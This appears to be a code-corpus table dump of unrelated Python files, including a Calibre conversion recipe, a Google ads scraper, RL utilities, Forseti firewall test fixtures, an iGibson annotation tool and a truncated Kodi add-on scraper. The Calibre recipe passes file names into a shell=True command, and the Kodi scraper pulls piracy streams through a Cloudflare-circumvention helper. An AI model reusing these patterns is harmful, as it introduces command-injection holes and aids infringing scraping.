max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
recipes/Python/579056_Run_OS_commtimeout_list_files__using_several/recipe-579056.py | tdiprima/code | 2,023 | 12690266 | <reponame>tdiprima/code
#process a filtered list of files by calling reapeatedly a
#console app(no console opens) in two parallel threads with a timeout
#<NAME> 2015
import os
import threading
import subprocess
def my_thread():
global files,path,timeout,options
myname= threading.currentThread().getName()
while files:
#create command to run
nextfile=files.pop()
#print name of thread and command being run
print('Thread {0} starts processing {1}'.format(myname,nextfile))
f=path + nextfile + options
try:
#timeout interrupts frozen command, shell=True does'nt open a console
subprocess.check_call(args= f , shell=True, timeout=timeout)
except subprocess.TimeoutExpired:
print('Thread {0} Processing {0} took too long' .format(myname,nextfile))
except subprocess.CalledProcessError as e:
print ('Thread {0} Processing {1} returned error {2}:{3}'.format(myname,nextfile,e.returncode,e.output))
except Exception as e:
print ('Thread {0} Processing {1} returned error {2}'.format(myname,nextfile,type(e).__name__))
print ('thread {0} stopped'.format(myname))
timeout=150
#the patth to the console app
exe_path = '\"C:/Program files/Calibre2/ebook-convert.exe" '
file_path = './' # so it can be called from a console opened in the folder whrer files are
options = '\" .epub > nul'
#filter the files in file_path
extensions = ['mobi','lit','prc','azw','rtf','odf' ] ;
files = [fn for fn in os.listdir(file_path) if any([fn.endswith(ext) for ext in extensions])];
path=exe_path +' \"'+file_path
#runs the same thread twice, each with a name
t1= threading.Thread(target=my_thread, name='uno' )
t1.start()
t2= threading.Thread(target=my_thread,name='dos' )
t2.start()
|
GoogleSearchKeyword/xgoogle/sponsoredlinks.py | imaging8896/google-parse | 109 | 12690269 | #!/usr/bin/python
#
# <NAME> (<EMAIL>)
# http://www.catonmat.net -- good coders code, great reuse
#
# http://www.catonmat.net/blog/python-library-for-google-sponsored-links-search/
#
# Code is licensed under MIT license.
#
import re
import urllib
import random
from htmlentitydefs import name2codepoint
from BeautifulSoup import BeautifulSoup
from browser import Browser, BrowserError
#
# TODO: join GoogleSearch and SponsoredLinks classes under a single base class
#
class SLError(Exception):
""" Sponsored Links Error """
pass
class SLParseError(Exception):
"""
Parse error in Google results.
self.msg attribute contains explanation why parsing failed
self.tag attribute contains BeautifulSoup object with the most relevant tag that failed to parse
Thrown only in debug mode
"""
def __init__(self, msg, tag):
self.msg = msg
self.tag = tag
def __str__(self):
return self.msg
def html(self):
return self.tag.prettify()
GET_ALL_SLEEP_FUNCTION = object()
class SponsoredLink(object):
""" a single sponsored link """
def __init__(self, title, url, display_url, desc):
self.title = title
self.url = url
self.display_url = display_url
self.desc = desc
class SponsoredLinks(object):
SEARCH_URL_0 = "http://www.google.com/sponsoredlinks?q=%(query)s&btnG=Search+Sponsored+Links&hl=en"
NEXT_PAGE_0 = "http://www.google.com/sponsoredlinks?q=%(query)s&sa=N&start=%(start)d&hl=en"
SEARCH_URL_1 = "http://www.google.com/sponsoredlinks?q=%(query)s&num=%(num)d&btnG=Search+Sponsored+Links&hl=en"
NEXT_PAGE_1 = "http://www.google.com/sponsoredlinks?q=%(query)s&num=%(num)d&sa=N&start=%(start)d&hl=en"
def __init__(self, query, random_agent=False, debug=False):
self.query = query
self.debug = debug
self.browser = Browser(debug=debug)
self._page = 0
self.eor = False
self.results_info = None
self._results_per_page = 10
if random_agent:
self.browser.set_random_user_agent()
@property
def num_results(self):
if not self.results_info:
page = self._get_results_page()
self.results_info = self._extract_info(page)
if self.results_info['total'] == 0:
self.eor = True
return self.results_info['total']
def _get_results_per_page(self):
return self._results_per_page
def _set_results_par_page(self, rpp):
self._results_per_page = rpp
results_per_page = property(_get_results_per_page, _set_results_par_page)
def get_results(self):
if self.eor:
return []
page = self._get_results_page()
info = self._extract_info(page)
if self.results_info is None:
self.results_info = info
if info['to'] == info['total']:
self.eor = True
results = self._extract_results(page)
if not results:
self.eor = True
return []
self._page += 1
return results
def _get_all_results_sleep_fn(self):
return random.random()*5 + 1 # sleep from 1 - 6 seconds
def get_all_results(self, sleep_function=None):
if sleep_function is GET_ALL_SLEEP_FUNCTION:
sleep_function = self._get_all_results_sleep_fn
if sleep_function is None:
sleep_function = lambda: None
ret_results = []
while True:
res = self.get_results()
if not res:
return ret_results
ret_results.extend(res)
return ret_results
def _maybe_raise(self, cls, *arg):
if self.debug:
raise cls(*arg)
def _extract_info(self, soup):
empty_info = { 'from': 0, 'to': 0, 'total': 0 }
stats_span = soup.find('span', id='stats')
if not stats_span:
return empty_info
txt = ''.join(stats_span.findAll(text=True))
txt = txt.replace(',', '').replace(" ", ' ')
matches = re.search(r'Results (\d+) - (\d+) of (?:about )?(\d+)', txt)
if not matches:
return empty_info
return {'from': int(matches.group(1)), 'to': int(matches.group(2)), 'total': int(matches.group(3))}
def _get_results_page(self):
if self._page == 0:
if self._results_per_page == 10:
url = SponsoredLinks.SEARCH_URL_0
else:
url = SponsoredLinks.SEARCH_URL_1
else:
if self._results_per_page == 10:
url = SponsoredLinks.NEXT_PAGE_0
else:
url = SponsoredLinks.NEXT_PAGE_1
safe_url = url % { 'query': urllib.quote_plus(self.query),
'start': self._page * self._results_per_page,
'num': self._results_per_page }
try:
page = self.browser.get_page(safe_url)
except BrowserError, e:
raise SLError, "Failed getting %s: %s" % (e.url, e.error)
return BeautifulSoup(page)
def _extract_results(self, soup):
results = soup.findAll('div', {'class': 'g'})
ret_res = []
for result in results:
eres = self._extract_result(result)
if eres:
ret_res.append(eres)
return ret_res
def _extract_result(self, result):
title, url = self._extract_title_url(result)
display_url = self._extract_display_url(result) # Warning: removes 'cite' from the result
desc = self._extract_description(result)
if not title or not url or not display_url or not desc:
return None
return SponsoredLink(title, url, display_url, desc)
def _extract_title_url(self, result):
title_a = result.find('a')
if not title_a:
self._maybe_raise(SLParseError, "Title tag in sponsored link was not found", result)
return None, None
title = ''.join(title_a.findAll(text=True))
title = self._html_unescape(title)
url = title_a['href']
match = re.search(r'q=(http[^&]+)&', url)
if not match:
self._maybe_raise(SLParseError, "URL inside a sponsored link was not found", result)
return None, None
url = urllib.unquote(match.group(1))
return title, url
def _extract_display_url(self, result):
cite = result.find('cite')
if not cite:
self._maybe_raise(SLParseError, "<cite> not found inside result", result)
return None
return ''.join(cite.findAll(text=True))
def _extract_description(self, result):
cite = result.find('cite')
if not cite:
return None
cite.extract()
desc_div = result.find('div', {'class': 'line23'})
if not desc_div:
self._maybe_raise(ParseError, "Description tag not found in sponsored link", result)
return None
desc_strs = desc_div.findAll(text=True)[0:-1]
desc = ''.join(desc_strs)
desc = desc.replace("\n", " ")
desc = desc.replace(" ", " ")
return self._html_unescape(desc)
def _html_unescape(self, str):
def entity_replacer(m):
entity = m.group(1)
if entity in name2codepoint:
return unichr(name2codepoint[entity])
else:
return m.group(0)
def ascii_replacer(m):
cp = int(m.group(1))
if cp <= 255:
return unichr(cp)
else:
return m.group(0)
s = re.sub(r'&#(\d+);', ascii_replacer, str, re.U)
return re.sub(r'&([^;]+);', entity_replacer, s, re.U)
|
utils/game_utils.py | morozig/muzero | 111 | 12690289 | <gh_stars>100-1000
"""
File to define utilities for Game handling. The GameState data structures serve as the states that preserve the
information of an environment and is used within the Coach classes to handle environment data.
"""
from dataclasses import dataclass
import typing
import gym
from gym import Env, spaces
from gym.envs.atari import AtariEnv
import numpy as np
@dataclass
class GameState:
canonical_state: typing.Any # s_t
observation: np.ndarray # o_t
action: int # a_t
player: int # player_t
done: bool # I(s_t = s_T)
@dataclass
class GymState(GameState):
env: Env # Class for the (stateful) logic of Gym Environments at t.
@dataclass
class AtariState(GymState):
env: AtariEnv # Class for the (stateful) logic of Gym Atari Environments at t.
class DiscretizeAction(gym.ActionWrapper):
"""
Factorizes a continuous action space of an environment into n discrete actions.
"""
def __init__(self, env, n: int) -> None:
"""
Factorize the given environment's action space (a single continuous action) to n discrete actions.
:param env: Gym.Env Environment object from OpenAI Gym.
:param n: int Number of actions to factorize.
"""
assert isinstance(env.action_space, spaces.Box), (
"expected Box action space, got {}".format(type(env.action_space)))
assert env.action_space.is_bounded(), "expected bounded Box action space"
# We could support multiple dimensions, but that quickly becomes unmanagble with
# the single dimension spaces.Discrete. We can add a version using
# spaces.MultiDiscrete for that use case.
dims = np.product(env.action_space.shape)
assert dims == 1, f"expected 1d Box action space, got {dims}d space"
super(DiscretizeAction, self).__init__(env)
self.action_space = spaces.Discrete(n)
def action(self, action: int) -> float:
"""
Linearly scale the action integer between the continuous range.
Example if range: [-1, 1] and n = 3, then a'=0 -> a=-1, a=1 -> a'=0, a=2 -> a'=1
:param action: int Action bin to perform in the environment.
:return: float Action cast to the original, continuous, action space.
"""
low = self.env.action_space.low
high = self.env.action_space.high
action = low + (high - low) * action / (self.action_space.n - 1)
return action
def reverse_action(self, action: float) -> int:
""" Yield the closest bin action to the given continuous action. TODO """
pass
|
ptan/common/utils.py | ChengUVa/ptan | 492 | 12690319 | <reponame>ChengUVa/ptan
import sys
import time
import operator
from datetime import timedelta
import numpy as np
import collections
import torch
import torch.nn as nn
class SMAQueue:
"""
Queue of fixed size with mean, max, min operations
"""
def __init__(self, size):
self.queue = collections.deque()
self.size = size
def __iadd__(self, other):
if isinstance(other, (list, tuple)):
self.queue.extend(other)
else:
self.queue.append(other)
while len(self.queue) > self.size:
self.queue.popleft()
return self
def __len__(self):
return len(self.queue)
def __repr__(self):
return "SMAQueue(size=%d)" % self.size
def __str__(self):
return "SMAQueue(size=%d, len=%d)" % (self.size, len(self.queue))
def min(self):
if not self.queue:
return None
return np.min(self.queue)
def mean(self):
if not self.queue:
return None
return np.mean(self.queue)
def max(self):
if not self.queue:
return None
return np.max(self.queue)
class SpeedMonitor:
def __init__(self, batch_size, autostart=True):
self.batch_size = batch_size
self.start_ts = None
self.batches = None
if autostart:
self.reset()
def epoch(self):
if self.epoches is not None:
self.epoches += 1
def batch(self):
if self.batches is not None:
self.batches += 1
def reset(self):
self.start_ts = time.time()
self.batches = 0
self.epoches = 0
def seconds(self):
"""
Seconds since last reset
:return:
"""
return time.time() - self.start_ts
def samples_per_sec(self):
"""
Calculate samples per second since last reset() call
:return: float count samples per second or None if not started
"""
if self.start_ts is None:
return None
secs = self.seconds()
if abs(secs) < 1e-5:
return 0.0
return (self.batches + 1) * self.batch_size / secs
def epoch_time(self):
"""
Calculate average epoch time
:return: timedelta object
"""
if self.start_ts is None:
return None
s = self.seconds()
if self.epoches > 0:
s /= self.epoches + 1
return timedelta(seconds=s)
def batch_time(self):
"""
Calculate average batch time
:return: timedelta object
"""
if self.start_ts is None:
return None
s = self.seconds()
if self.batches > 0:
s /= self.batches + 1
return timedelta(seconds=s)
class WeightedMSELoss(nn.Module):
def __init__(self, size_average=True):
super(WeightedMSELoss, self).__init__()
self.size_average = size_average
def forward(self, input, target, weights=None):
if weights is None:
return nn.MSELoss(self.size_average)(input, target)
loss_rows = (input - target) ** 2
if len(loss_rows.size()) != 1:
loss_rows = torch.sum(loss_rows, dim=1)
res = (weights * loss_rows).sum()
if self.size_average:
res /= len(weights)
return res
class SegmentTree(object):
def __init__(self, capacity, operation, neutral_element):
"""Build a Segment Tree data structure.
https://en.wikipedia.org/wiki/Segment_tree
Can be used as regular array, but with two
important differences:
a) setting item's value is slightly slower.
It is O(lg capacity) instead of O(1).
b) user has access to an efficient `reduce`
operation which reduces `operation` over
a contiguous subsequence of items in the
array.
Paramters
---------
capacity: int
Total size of the array - must be a power of two.
operation: lambda obj, obj -> obj
and operation for combining elements (eg. sum, max)
must for a mathematical group together with the set of
possible values for array elements.
neutral_element: obj
neutral element for the operation above. eg. float('-inf')
for max and 0 for sum.
"""
assert capacity > 0 and capacity & (capacity - 1) == 0, "capacity must be positive and a power of 2."
self._capacity = capacity
self._value = [neutral_element for _ in range(2 * capacity)]
self._operation = operation
def _reduce_helper(self, start, end, node, node_start, node_end):
if start == node_start and end == node_end:
return self._value[node]
mid = (node_start + node_end) // 2
if end <= mid:
return self._reduce_helper(start, end, 2 * node, node_start, mid)
else:
if mid + 1 <= start:
return self._reduce_helper(start, end, 2 * node + 1, mid + 1, node_end)
else:
return self._operation(
self._reduce_helper(start, mid, 2 * node, node_start, mid),
self._reduce_helper(mid + 1, end, 2 * node + 1, mid + 1, node_end)
)
def reduce(self, start=0, end=None):
"""Returns result of applying `self.operation`
to a contiguous subsequence of the array.
self.operation(arr[start], operation(arr[start+1], operation(... arr[end])))
Parameters
----------
start: int
beginning of the subsequence
end: int
end of the subsequences
Returns
-------
reduced: obj
result of reducing self.operation over the specified range of array elements.
"""
if end is None:
end = self._capacity
if end < 0:
end += self._capacity
end -= 1
return self._reduce_helper(start, end, 1, 0, self._capacity - 1)
def __setitem__(self, idx, val):
# index of the leaf
idx += self._capacity
self._value[idx] = val
idx //= 2
while idx >= 1:
self._value[idx] = self._operation(
self._value[2 * idx],
self._value[2 * idx + 1]
)
idx //= 2
def __getitem__(self, idx):
assert 0 <= idx < self._capacity
return self._value[self._capacity + idx]
class SumSegmentTree(SegmentTree):
def __init__(self, capacity):
super(SumSegmentTree, self).__init__(
capacity=capacity,
operation=operator.add,
neutral_element=0.0
)
def sum(self, start=0, end=None):
"""Returns arr[start] + ... + arr[end]"""
return super(SumSegmentTree, self).reduce(start, end)
def find_prefixsum_idx(self, prefixsum):
"""Find the highest index `i` in the array such that
sum(arr[0] + arr[1] + ... + arr[i - i]) <= prefixsum
if array values are probabilities, this function
allows to sample indexes according to the discrete
probability efficiently.
Parameters
----------
perfixsum: float
upperbound on the sum of array prefix
Returns
-------
idx: int
highest index satisfying the prefixsum constraint
"""
assert 0 <= prefixsum <= self.sum() + 1e-5
idx = 1
while idx < self._capacity: # while non-leaf
if self._value[2 * idx] > prefixsum:
idx = 2 * idx
else:
prefixsum -= self._value[2 * idx]
idx = 2 * idx + 1
return idx - self._capacity
class MinSegmentTree(SegmentTree):
def __init__(self, capacity):
super(MinSegmentTree, self).__init__(
capacity=capacity,
operation=min,
neutral_element=float('inf')
)
def min(self, start=0, end=None):
"""Returns min(arr[start], ..., arr[end])"""
return super(MinSegmentTree, self).reduce(start, end)
class TBMeanTracker:
"""
TensorBoard value tracker: allows to batch fixed amount of historical values and write their mean into TB
Designed and tested with pytorch-tensorboard in mind
"""
def __init__(self, writer, batch_size):
"""
:param writer: writer with close() and add_scalar() methods
:param batch_size: integer size of batch to track
"""
assert isinstance(batch_size, int)
assert writer is not None
self.writer = writer
self.batch_size = batch_size
def __enter__(self):
self._batches = collections.defaultdict(list)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.writer.close()
@staticmethod
def _as_float(value):
assert isinstance(value, (float, int, np.ndarray, np.generic, torch.autograd.Variable)) or torch.is_tensor(value)
tensor_val = None
if isinstance(value, torch.autograd.Variable):
tensor_val = value.data
elif torch.is_tensor(value):
tensor_val = value
if tensor_val is not None:
return tensor_val.float().mean().item()
elif isinstance(value, np.ndarray):
return float(np.mean(value))
else:
return float(value)
def track(self, param_name, value, iter_index):
assert isinstance(param_name, str)
assert isinstance(iter_index, int)
data = self._batches[param_name]
data.append(self._as_float(value))
if len(data) >= self.batch_size:
self.writer.add_scalar(param_name, np.mean(data), iter_index)
data.clear()
class RewardTracker:
def __init__(self, writer, min_ts_diff=1.0):
"""
Constructs RewardTracker
:param writer: writer to use for writing stats
:param min_ts_diff: minimal time difference to track speed
"""
self.writer = writer
self.min_ts_diff = min_ts_diff
def __enter__(self):
self.ts = time.time()
self.ts_frame = 0
self.total_rewards = []
return self
def __exit__(self, *args):
self.writer.close()
def reward(self, reward, frame, epsilon=None):
self.total_rewards.append(reward)
mean_reward = np.mean(self.total_rewards[-100:])
ts_diff = time.time() - self.ts
if ts_diff > self.min_ts_diff:
speed = (frame - self.ts_frame) / ts_diff
self.ts_frame = frame
self.ts = time.time()
epsilon_str = "" if epsilon is None else ", eps %.2f" % epsilon
print("%d: done %d episodes, mean reward %.3f, speed %.2f f/s%s" % (
frame, len(self.total_rewards), mean_reward, speed, epsilon_str
))
sys.stdout.flush()
self.writer.add_scalar("speed", speed, frame)
if epsilon is not None:
self.writer.add_scalar("epsilon", epsilon, frame)
self.writer.add_scalar("reward_100", mean_reward, frame)
self.writer.add_scalar("reward", reward, frame)
return mean_reward if len(self.total_rewards) > 30 else None
|
tests/scanner/scanners/data/fake_firewall_rules.py | aarontp/forseti-security | 921 | 12690327 | <filename>tests/scanner/scanners/data/fake_firewall_rules.py
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test data for firewall rules scanners."""
FAKE_FIREWALL_RULE_FOR_TEST_PROJECT = {
'name': 'policy1',
'full_name': ('organization/org/folder/folder1/'
'project/project0/firewall/policy1/'),
'network': 'network1',
'direction': 'ingress',
'allowed': [{'IPProtocol': 'tcp', 'ports': ['1', '3389']}],
'sourceRanges': ['0.0.0.0/0'],
'targetTags': ['linux'],
}
FAKE_FIREWALL_RULE_FOR_PROJECT1 = {
'name': 'policy1',
'full_name':
('organization/org/folder/test_instances/'
'project/project1/firewall/policy1/'),
'network': 'network1',
'direction': 'ingress',
'allowed': [{'IPProtocol': 'tcp', 'ports': ['22']}],
'sourceRanges': ['172.16.58.3'],
'targetTags': ['test'],
} |
igibson/utils/data_utils/ext_object/scripts_wip/link_annotation_tool.py | suresh-guttikonda/iGibson | 360 | 12690364 | import itertools
import json
import os
import numpy as np
import pybullet as p
from bddl.object_taxonomy import ObjectTaxonomy
from pynput import keyboard
import igibson
from igibson.objects.articulated_object import URDFObject
from igibson.objects.visual_marker import VisualMarker
from igibson.scenes.empty_scene import EmptyScene
from igibson.simulator import Simulator
from igibson.utils.assets_utils import download_assets
download_assets()
ABILITY_NAME = "cleaningTool"
SYNSETS = [
"alarm.n.02",
"printer.n.03",
"facsimile.n.02",
"scanner.n.02",
"modem.n.01",
]
CATEGORIES = [
"broom",
"carpet_sweeper",
"scraper",
"scrub_brush",
"toothbrush",
"vacuum",
]
MODE = "synset" # "ability, "category"
LINK_NAME = "toggle_button"
IS_CUBOID = False
SKIP_EXISTING = False
OBJECT_TAXONOMY = ObjectTaxonomy()
def get_categories():
dir = os.path.join(igibson.ig_dataset_path, "objects")
return [cat for cat in os.listdir(dir) if os.path.isdir(get_category_directory(cat))]
def get_category_directory(category):
return os.path.join(igibson.ig_dataset_path, "objects", category)
def get_obj(folder):
return URDFObject(os.path.join(folder, os.path.basename(folder) + ".urdf"), name="obj", model_path=folder)
def get_metadata_filename(objdir):
return os.path.join(objdir, "misc", "metadata.json")
def get_corner_positions(base, rotation, size):
quat = p.getQuaternionFromEuler(rotation)
options = [-1, 1]
outputs = []
for pos in itertools.product(options, options, options):
res = p.multiplyTransforms(base, quat, np.array(pos) * size / 2.0, [0, 0, 0, 1])
outputs.append(res)
return outputs
def main():
# Collect the relevant categories.
categories = CATEGORIES
if MODE == "ability":
categories = []
for cat in get_categories():
# Check that the category has this label.
klass = OBJECT_TAXONOMY.get_class_name_from_igibson_category(cat)
if not klass:
continue
if not OBJECT_TAXONOMY.has_ability(klass, ABILITY_NAME):
continue
categories.append(cat)
elif MODE == "synset":
categories = []
for synset in SYNSETS:
categories.extend(OBJECT_TAXONOMY.get_igibson_categories(synset))
categories = set(categories) & set(get_categories())
print("%d categories: %s" % (len(categories), ", ".join(categories)))
# Now collect the actual objects.
objects = []
objects_by_category = {}
for cat in categories:
cd = get_category_directory(cat)
objects_by_category[cat] = []
for objdir in os.listdir(cd):
objdirfull = os.path.join(cd, objdir)
objects.append(objdirfull)
objects_by_category[cat].append(objdirfull)
print("%d objects.\n" % len(objects))
for cat in categories:
cd = get_category_directory(cat)
for objdir in os.listdir(cd):
objdirfull = os.path.join(cd, objdir)
mfn = get_metadata_filename(objdirfull)
with open(mfn, "r") as mf:
meta = json.load(mf)
offset = np.array([0.0, 0.0, 0.0])
size = np.array([0.0, 0.0, 0.0])
rotation = np.array([0.0, 0.0, 0.0])
existing = False
if "links" in meta and LINK_NAME in meta["links"]:
print("%s/%s already has the requested link." % (cat, objdir))
if SKIP_EXISTING:
continue
existing = True
offset = np.array(meta["links"][LINK_NAME]["xyz"])
if IS_CUBOID:
size = np.array(meta["links"][LINK_NAME]["size"])
rotation = np.array(meta["links"][LINK_NAME]["rpy"])
s = Simulator(mode="gui")
scene = EmptyScene()
s.import_scene(scene)
obj = get_obj(objdirfull)
s.import_object(obj)
obj_pos = np.array([0.0, 0.0, 1.0])
obj.set_position(obj_pos)
dim = max(obj.bounding_box)
marker_size = dim / 100.0
steps = [dim * 0.1, dim * 0.01, dim * 0.001]
rot_steps = [np.deg2rad(1), np.deg2rad(5), np.deg2rad(10)]
m = VisualMarker(radius=marker_size, rgba_color=[0, 0, 1, 0.5])
s.import_object(m)
if IS_CUBOID:
initial_poses = get_corner_positions(obj_pos + offset, rotation, size)
markers = [VisualMarker(radius=marker_size, rgba_color=[0, 1, 0, 0.5]) for _ in initial_poses]
[s.import_object(m) for m in markers]
for marker, (pos, orn) in zip(markers, initial_poses):
marker.set_position_orientation(pos, orn)
# if existing:
# e = VisualMarker(radius=0.02, rgba_color=[1, 0, 0, 0.5])
# s.import_object(e)
# e.set_position(obj_pos + offset)
step_size = steps[1]
rot_step_size = rot_steps[1]
done = False
while not done:
with keyboard.Events() as events:
for event in events:
if (
event is None
or not isinstance(event, keyboard.Events.Press)
or not hasattr(event.key, "char")
):
continue
if event.key.char == "w":
print("Moving forward one")
offset += np.array([0, 1, 0]) * step_size
elif event.key.char == "a":
print("Moving left one")
offset += np.array([-1, 0, 0]) * step_size
elif event.key.char == "s":
print("Moving back one")
offset += np.array([0, -1, 0]) * step_size
elif event.key.char == "d":
print("Moving right one")
offset += np.array([1, 0, 0]) * step_size
elif event.key.char == "q":
print("Moving up one")
offset += np.array([0, 0, 1]) * step_size
elif event.key.char == "z":
print("Moving down one")
offset += np.array([0, 0, -1]) * step_size
elif event.key.char == "1":
print("Sizing forward one")
size += np.array([0, 1, 0]) * step_size
elif event.key.char == "2":
print("Sizing back one")
size += np.array([0, -1, 0]) * step_size
elif event.key.char == "4":
print("Sizing left one")
size += np.array([-1, 0, 0]) * step_size
elif event.key.char == "5":
print("Sizing right one")
size += np.array([1, 0, 0]) * step_size
elif event.key.char == "7":
print("Sizing up one")
size += np.array([0, 0, 1]) * step_size
elif event.key.char == "8":
print("Sizing down one")
size += np.array([0, 0, -1]) * step_size
elif event.key.char == "t":
print("Rotation +X one")
rotation += np.array([1, 0, 0]) * rot_step_size
elif event.key.char == "y":
print("Rotation -X one")
rotation += np.array([-1, 0, 0]) * rot_step_size
elif event.key.char == "u":
print("Rotation +Y one")
rotation += np.array([0, 1, 0]) * rot_step_size
elif event.key.char == "i":
print("Rotation -Y one")
rotation += np.array([0, -1, 0]) * rot_step_size
elif event.key.char == "o":
print("Rotation +Z one")
rotation += np.array([0, 0, 1]) * rot_step_size
elif event.key.char == "p":
print("Rotation -Z one")
rotation += np.array([0, 0, -1]) * rot_step_size
elif event.key.char == "h":
print("Step to 0.1")
step_size = steps[0]
rot_step_size = rot_steps[0]
elif event.key.char == "j":
print("Step to 0.01")
step_size = steps[1]
rot_step_size = rot_steps[1]
elif event.key.char == "k":
print("Step to 0.001")
step_size = steps[2]
rot_step_size = rot_steps[2]
elif event.key.char == "b":
print("Updating box to match bounding box.")
offset = np.array([0.0, 0.0, 0.0])
rotation = np.array([0.0, 0.0, 0.0])
size = np.array(obj.bounding_box, dtype=float)
elif event.key.char == "c":
done = True
break
print("New position:", offset)
m.set_position(obj_pos + offset)
if IS_CUBOID:
print("New rotation:", rotation)
print("New size:", size)
print("")
poses = get_corner_positions(obj_pos + offset, rotation, size)
for marker, (pos, orn) in zip(markers, poses):
marker.set_position_orientation(pos, orn)
# Record it into the meta file.
if "links" not in meta:
meta["links"] = dict()
dynamics_info = p.getDynamicsInfo(obj.get_body_id(), -1)
inertial_pos, inertial_orn = dynamics_info[3], dynamics_info[4]
rel_position, rel_orn = p.multiplyTransforms(
offset, p.getQuaternionFromEuler(rotation), inertial_pos, inertial_orn
)
if IS_CUBOID:
meta["links"][LINK_NAME] = {
"geometry": "box",
"size": list(size),
"xyz": list(rel_position),
"rpy": list(p.getEulerFromQuaternion(rel_orn)),
}
else:
meta["links"][LINK_NAME] = {"geometry": None, "size": None, "xyz": list(rel_position), "rpy": None}
with open(mfn, "w") as mf:
json.dump(meta, mf)
print("Updated %s" % mfn)
input("Hit enter to continue.")
s.disconnect()
if __name__ == "__main__":
main()
|
eval/segment_metrics.py | swafe/DeepSegmentor | 150 | 12690385 | # Author: <NAME> <<EMAIL>>
"""
Calculate Segmentation metrics:
- GlobalAccuracy
- MeanAccuracy
- Mean MeanIoU
"""
import numpy as np
from data_io import imread
def cal_semantic_metrics(pred_list, gt_list, thresh_step=0.01, num_cls=2):
final_accuracy_all = []
for thresh in np.arange(0.0, 1.0, thresh_step):
print(thresh)
global_accuracy_cur = []
statistics = []
for pred, gt in zip(pred_list, gt_list):
gt_img = (gt/255).astype('uint8')
pred_img = (pred/255 > thresh).astype('uint8')
# calculate each image
global_accuracy_cur.append(cal_global_acc(pred_img, gt_img))
statistics.append(get_statistics(pred_img, gt_img, num_cls))
# get global accuracy with corresponding threshold: (TP+TN)/all_pixels
global_acc = np.sum([v[0] for v in global_accuracy_cur])/np.sum([v[1] for v in global_accuracy_cur])
# get tp, fp, fn
counts = []
for i in range(num_cls):
tp = np.sum([v[i][0] for v in statistics])
fp = np.sum([v[i][1] for v in statistics])
fn = np.sum([v[i][2] for v in statistics])
counts.append([tp, fp, fn])
# calculate mean accuracy
mean_acc = np.sum([v[0]/(v[0]+v[2]) for v in counts])/num_cls
# calculate mean iou
mean_iou_acc = np.sum([v[0]/(np.sum(v)) for v in counts])/num_cls
final_accuracy_all.append([thresh, global_acc, mean_acc, mean_iou_acc])
return final_accuracy_all
def cal_global_acc(pred, gt):
"""
acc = (TP+TN)/all_pixels
"""
h,w = gt.shape
return [np.sum(pred==gt), float(h*w)]
def get_statistics(pred, gt, num_cls=2):
"""
return tp, fp, fn
"""
h,w = gt.shape
statistics = []
for i in range(num_cls):
tp = np.sum((pred==i)&(gt==i))
fp = np.sum((pred==i)&(gt!=i))
fn = np.sum((pred!=i)&(gt==i))
statistics.append([tp, fp, fn])
return statistics
|
plugin.video.fanfilm/resources/lib/sources/disabled/dizimag_tv.py | mrknow/filmkodi | 105 | 12690393 | # -*- coding: utf-8 -*-
'''
FanFilm Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.libraries import cleantitle
from resources.lib.libraries import client
from resources.lib.libraries import cache
from resources.lib.libraries import control
from resources.lib.libraries import cloudflare
class source:
def __init__(self):
self.base_link = 'http://dizimag.co'
self.headers = {'X-Requested-With' : 'XMLHttpRequest'}
def dizimag_shows(self):
try:
result = cloudflare.source(self.base_link)
result = client.parseDOM(result, 'div', attrs = {'id': 'fil'})[0]
result = zip(client.parseDOM(result, 'a', ret='href'), client.parseDOM(result, 'a'))
result = [(re.sub('http.+?//.+?/','/', i[0]), cleantitle.tv(i[1])) for i in result]
return result
except:
return
def get_show(self, imdb, tvdb, tvshowtitle, year):
try:
result = cache.get(self.dizimag_shows, 72)
tvshowtitle = cleantitle.tv(tvshowtitle)
result = [i[0] for i in result if tvshowtitle == i[1]][0]
try: url = re.compile('//.+?(/.+)').findall(result)[0]
except: url = result
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def get_episode(self, url, imdb, tvdb, title, date, season, episode):
try:
if url == None: return
url = urlparse.urljoin(self.base_link, url)
result = client.source(url)
result = client.parseDOM(result, 'a', ret='href')
result = [i for i in result if '/%01d-sezon-%01d-bolum-' % (int(season), int(episode)) in i][0]
try: url = re.compile('//.+?(/.+)').findall(result)[0]
except: url = result
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def get_sources(self, url, hosthdDict, hostDict, locDict):
try:
sources = []
if url == None: return sources
sources_url = urlparse.urljoin(self.base_link, url)
result = client.request(sources_url, close=False)
result = re.compile('<script[^>]*>(.*?)</script>', re.DOTALL).findall(result)
result = [re.compile("var\s+kaynaklar.*?url\s*:\s*\"([^\"]+)\"\s*,\s*data\s*:\s*'([^']+)").findall(i.replace('\n', '')) for i in result]
result = [i[0] for i in result if len(i) > 0][0]
url = urlparse.urljoin(self.base_link, result[0])
post = result[1]
result = client.request(url, post=post, headers=self.headers)
result = re.compile('"videolink\d*"\s*:\s*"([^"]+)","videokalite\d*"\s*:\s*"?(\d+)p?').findall(result)
result = [(i[0].replace('\\/', '/'), i[1]) for i in result]
try:
url = [i for i in result if not 'google' in i[0]]
url = [('%s|User-Agent=%s&Referer=%s' % (i[0].decode('unicode_escape'), urllib.quote_plus(client.agent()), urllib.quote_plus(sources_url)), i[1]) for i in url]
try: sources.append({'source': 'Dizimag', 'quality': '1080p', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '1080'][0]})
